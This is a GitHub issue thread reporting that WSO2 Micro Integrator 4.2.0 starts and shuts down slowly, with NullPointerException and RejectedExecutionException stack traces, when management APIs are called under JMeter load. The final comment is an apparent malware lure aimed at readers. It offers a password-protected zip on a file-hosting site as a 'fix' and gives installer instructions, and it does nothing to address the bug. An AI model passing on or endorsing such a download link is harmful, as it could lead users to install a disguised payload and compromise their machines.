### ISSUE TITLE
[Bug]: Cannot execute graceful shutdown smoothly when Management APIs are in use

### ISSUE THREAD

**Issue by AselaPathirage** [wso2/micro-integrator#3571]
### Description

When we invoke management APIs during the server startup or shutdown, the server may not be able to perform a smooth startup or shutdown. We encountered the following error stack trace while invoking the management APIs during server startup.
```
ERROR {InboundHttpServerWorker} - Exception occurred when running org.wso2.carbon.inbound.endpoint.protocol.http.InboundHttpServerWorker java.lang.NullPointerException
	at org.wso2.micro.integrator.management.apis.security.handler.JWTInMemoryTokenStore.getToken(JWTInMemoryTokenStore.java:82)
	at org.wso2.micro.integrator.management.apis.security.handler.JWTTokenSecurityHandler.authenticate(JWTTokenSecurityHandler.java:88)
	at org.wso2.micro.integrator.management.apis.security.handler.AuthenticationHandlerAdapter.handle(AuthenticationHandlerAdapter.java:74)
	at org.wso2.micro.integrator.management.apis.security.handler.SecurityHandlerAdapter.invoke(SecurityHandlerAdapter.java:119)
	at org.wso2.micro.integrator.management.apis.security.handler.JWTTokenSecurityHandler.invoke(JWTTokenSecurityHandler.java:47)
	at org.wso2.carbon.inbound.endpoint.internal.http.api.InternalAPIDispatcher.dispatch(InternalAPIDispatcher.java:76)
	at org.wso2.carbon.inbound.endpoint.protocol.http.InboundHttpServerWorker.run(InboundHttpServerWorker.java:114)
	at org.apache.axis2.transport.base.threads.NativeWorkerPool$1.run(NativeWorkerPool.java:172)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
	at java.base/java.lang.Thread.run(Thread.java:829)
```

When attempting to shut down using Ctrl+C while invoking the management APIs the shutdown was not smooth, experienced a delay of a few minutes, and the following stack trace appeared in the logs.
```
[2024-08-19 20:44:38,577] ERROR {SourceHandler} - Unexpected error: Task org.apache.axis2.transport.base.threads.NativeWorkerPool$1@6ca42d5d rejected from org.apache.axis2.transport.base.threads.Axis2ThreadPoolExecutor@3a39683[Terminated, pool size = 0, active threads = 0, queued tasks = 0, completed tasks = 1321906] java.util.concurrent.RejectedExecutionException: Task org.apache.axis2.transport.base.threads.NativeWorkerPool$1@6ca42d5d rejected from org.apache.axis2.transport.base.threads.Axis2ThreadPoolExecutor@3a39683[Terminated, pool size = 0, active threads = 0, queued tasks = 0, completed tasks = 1321906]
	at java.base/java.util.concurrent.ThreadPoolExecutor$AbortPolicy.rejectedExecution(ThreadPoolExecutor.java:2055)
	at java.base/java.util.concurrent.ThreadPoolExecutor.reject(ThreadPoolExecutor.java:825)
	at java.base/java.util.concurrent.ThreadPoolExecutor.execute(ThreadPoolExecutor.java:1355)
	at org.apache.axis2.transport.base.threads.NativeWorkerPool.execute(NativeWorkerPool.java:169)
	at org.wso2.carbon.inbound.endpoint.protocol.http.InboundHttpSourceHandler.requestReceived(InboundHttpSourceHandler.java:117)
	at org.apache.http.impl.nio.DefaultNHttpServerConnection.consumeInput(DefaultNHttpServerConnection.java:273)
	at org.apache.synapse.transport.http.conn.LoggingNHttpServerConnection.consumeInput(LoggingNHttpServerConnection.java:114)
	at org.apache.synapse.transport.passthru.core.MultiListenerServerIODispatch.onInputReady(MultiListenerServerIODispatch.java:110)
	at org.apache.synapse.transport.passthru.core.MultiListenerServerIODispatch.onInputReady(MultiListenerServerIODispatch.java:34)
	at org.apache.http.impl.nio.reactor.AbstractIODispatch.inputReady(AbstractIODispatch.java:121)
	at org.apache.http.impl.nio.reactor.BaseIOReactor.readable(BaseIOReactor.java:162)
	at org.apache.http.impl.nio.reactor.AbstractIOReactor.processEvent(AbstractIOReactor.java:337)
	at org.apache.http.impl.nio.reactor.AbstractIOReactor.processEvents(AbstractIOReactor.java:315)
	at org.apache.http.impl.nio.reactor.AbstractIOReactor.execute(AbstractIOReactor.java:276)
	at org.apache.http.impl.nio.reactor.BaseIOReactor.execute(BaseIOReactor.java:104)
	at org.apache.http.impl.nio.reactor.AbstractMultiworkerIOReactor$Worker.run(AbstractMultiworkerIOReactor.java:591)
	at java.base/java.lang.Thread.run(Thread.java:829)
```

During management requests, we started and shut down the server, and made the following observations.

Case 01
Users: 100
Ramp up period: 1s
Loop count: infinite
Observation: Delay in server startup and a delay of minutes in server shutdown. Encountered error traces in the logs.

Case 02
Users: 10
Ramp up period: 1s
Loop count: infinite
Observation: A few minutes of delay in server shutdown were encountered, with error traces found in the logs during both startup and shutdown.

### Steps to Reproduce

1. Start the Jmeter and invoke the Management APIs 
2. Start the MI 4.2.0 server.
3. Shutdown the server using Ctrl+C

### Affected Version(s)

MI 4.2.0

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
